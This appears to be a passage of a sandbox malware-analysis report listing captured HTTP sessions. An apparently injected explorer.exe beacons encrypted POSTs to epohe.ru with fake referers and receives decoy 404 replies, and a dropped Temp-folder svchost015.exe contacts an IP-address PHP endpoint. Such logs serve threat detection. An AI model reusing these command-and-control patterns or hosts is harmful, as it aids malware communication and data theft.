                                              Sep 2, 2024 11:42:46.152154922 CEST353OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 38 3a aa a6
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu8:vc8FX)Vmf"l5@Ks[8_ =|{|T=1XZY1{8E$v|{hB:Mpb4I
                                              Sep 2, 2024 11:42:47.094243050 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:46 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449757102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:47.102015972 CEST269OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://jjpobfosorxh.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 214
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:47.102040052 CEST214OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 21 3f e6 8b
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu!?T^R*wUPxk(}.^WU5j53T '?f}z:K3L~ghL*_(+
                                              Sep 2, 2024 11:42:48.002998114 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:47 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449758102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:48.010832071 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://tfebikfnyin.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 338
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:48.010863066 CEST338OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 46 0c ab bd
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuFQ^{gjc(\>jIj5ctRKBnWYOz{B!c{"WGG\%k[<KT2KH71L:3
                                              Sep 2, 2024 11:42:48.936934948 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:48 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449759102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:48.945523024 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://pkxpvxaevqgmdlaa.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 142
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:48.945555925 CEST142OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 71 33 d1 ac
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuq3{Q}|ICw,4"l^$3>FA
                                              Sep 2, 2024 11:42:49.851730108 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:49 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449760102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:49.862679005 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://fprowwsvixkulpo.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 334
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:49.862703085 CEST334OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 4c 31 d7 f3
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuL1z[Co ee>iHoz%V,QU@+1X!5GNY}DE/S!B57X'Jc]1WNE;/Wt
                                              Sep 2, 2024 11:42:50.783155918 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.449761102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:50.790874004 CEST269OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://pwnffqufngll.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 117
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:50.790896893 CEST117OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 58 01 a0 f5
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuX@D 0)q
                                              Sep 2, 2024 11:42:51.699743986 CEST219INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:51 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc
                                              Data Ascii: #\6}Q<Q6/"Y<f[PhTQ|~B9=#


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449764102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:55.538932085 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://sxaiuwdsglaywc.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 226
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:55.538964987 CEST226OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 2b 49 d6 89
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA ,[k,vu+IZ*cBxt6k(_vv?)g-Mgm7A(0Sskkg_<TFV1Lenpqp!7
                                              Sep 2, 2024 11:42:56.442466974 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:56 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.449765102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:56.528613091 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://wuipisboawsvs.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 267
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:56.528635979 CEST267OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3d 34 a6 e5
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu=4;tpc*y9V>TZ!#Z09[;L`5Qm<b*nyC&zC_>%ND8WM[X`|H
                                              Sep 2, 2024 11:42:57.435973883 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:57 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.449766102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:57.452656031 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://kvkvjbbqhfudfxqw.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 140
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:57.452670097 CEST140OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 4d 5a ec b7
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuMZjRxJvX:=RP:PSWty~
                                              Sep 2, 2024 11:42:58.474567890 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:58 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.44976791.202.233.158807940C:\Users\user\AppData\Local\Temp\svchost015.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:43:00.359291077 CEST89OUTGET / HTTP/1.1
                                              Host: 91.202.233.158
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Sep 2, 2024 11:43:01.015923023 CEST203INHTTP/1.1 200 OK
                                              Date: Mon, 02 Sep 2024 09:43:00 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Content-Length: 0
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Sep 2, 2024 11:43:01.020457029 CEST415OUTPOST /e96ea2db21fa9a1b.php HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
                                              Host: 91.202.233.158
                                              Content-Length: 214
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
